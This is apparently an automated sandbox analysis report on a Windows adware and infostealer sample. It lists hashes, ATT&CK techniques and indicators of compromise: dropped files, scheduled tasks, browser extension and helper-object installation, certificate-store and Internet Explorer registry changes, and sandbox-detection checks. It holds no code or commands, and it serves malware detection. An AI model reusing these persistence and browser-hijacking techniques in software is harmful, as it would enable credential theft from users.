002f47bb6e9157769a3ff8aba74cbb9cc764390da8c07f0f5cbc22e8b3d3106f

Analysis

max time kernel
118s
max time network
113s
platform
windows10_x64
resource
win10v20210410
submitted
21-06-2021 07:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5bda03599e20fd2226c14ad3f22a518b.exe
Size

6.2MB
MD5

5bda03599e20fd2226c14ad3f22a518b
SHA1

887f36bc21fa6ba4d59c418405a3b12f3996300b
SHA256

002f47bb6e9157769a3ff8aba74cbb9cc764390da8c07f0f5cbc22e8b3d3106f
SHA512

36ec72bd6732445da58f3c32e376699e3613a5dbeb41bf6f5f70cdb88c2567f1c3b9472bbd8cd8ab7be03992c2b697424c99ed646e96d08c962a1672f2e343bb

Score

10^/10

adware discovery persistence spyware stealer

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

17 876 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exePIBpJDt.exeZNIZXhj.exeFYIHyAw.exe

pid process

916 SimplInst.exe
1664 SimplInst.exe
2580 PIBpJDt.exe
756 ZNIZXhj.exe
1320 FYIHyAw.exe

flow	pid	process
17	876	rundll32.exe

pid	process
916	SimplInst.exe
1664	SimplInst.exe
2580	PIBpJDt.exe
756	ZNIZXhj.exe
1320	FYIHyAw.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

876 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

ZNIZXhj.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZNIZXhj.exe
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

pid	process
876	rundll32.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	ZNIZXhj.exe

Drops file in System32 directory 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exePIBpJDt.exepowershell.exepowershell.exeSimplInst.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	rundll32.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	PIBpJDt.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	PIBpJDt.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	rundll32.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe

Drops file in Program Files directory 64 IoCs

Processes:

ZNIZXhj.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ro\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sw\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\PDkSqQD.xml	ZNIZXhj.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hi\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\it\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hu\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\kn\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mr\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ms\messages.json	ZNIZXhj.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\de\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\gu\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lv\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\tgZBuA7n.dll	ZNIZXhj.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es_419\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fr\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sq\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ta\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\iWACcQp.dll	ZNIZXhj.exe
File created	C:\Program Files (x86)\anjFGKdzU\kuTEXGw.xml	ZNIZXhj.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\BLkhyQQ.xml	ZNIZXhj.exe
File created	C:\Program Files (x86)\fcsvEsvhbcUn\IAPkyTa.dll	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ca\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\et\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fil\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\icon16.ico	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\am\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\bg\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\lfcipvF.xml	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\th\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\xHEcvSy.dll	ZNIZXhj.exe
File created	C:\Program Files (x86)\anjFGKdzU\srAtop.dll	ZNIZXhj.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sl\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\he\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\no\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\vi\messages.json	ZNIZXhj.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ar\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\da\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\lTCKlOA.exe	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pl\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sk\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_CN\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ru\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\ktTXGKPDP.dll	ZNIZXhj.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\PswrXAdtUowpY.dll	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_US\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ja\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sv\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\uk\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\background.html	ZNIZXhj.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fi\messages.json	ZNIZXhj.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2884	schtasks.exe
1876	schtasks.exe
3904	schtasks.exe
2652	schtasks.exe
200	schtasks.exe
1284	schtasks.exe
1192	schtasks.exe
3480	schtasks.exe
1748	schtasks.exe
2312	schtasks.exe
3864	schtasks.exe
3796	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeSimplInst.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 15 IoCs

adware spyware

Modify Registry

T1112

Processes:

ZNIZXhj.exeFYIHyAw.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	ZNIZXhj.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "lTCKlOA.exe"	ZNIZXhj.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd348570bb1460e0d9402efd926768604	ZNIZXhj.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	FYIHyAw.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	ZNIZXhj.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Approved Extensions	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "lTCKlOA.exe"	ZNIZXhj.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights	ZNIZXhj.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	FYIHyAw.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	ZNIZXhj.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	ZNIZXhj.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	ZNIZXhj.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\lTCKlOA.exe = "9999"	ZNIZXhj.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	ZNIZXhj.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

PIBpJDt.exepowershell.exepowershell.exeZNIZXhj.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PIBpJDt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{266d1ca4-0000-0000-0000-500600000000}\NukeOnDelete = "0"	ZNIZXhj.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ZNIZXhj.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	ZNIZXhj.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe

Modifies registry class 64 IoCs

Processes:

ZNIZXhj.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\lTCKlOA.exe"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\ = "BackgroundScriptEngine Class"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	ZNIZXhj.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	ZNIZXhj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	ZNIZXhj.exe
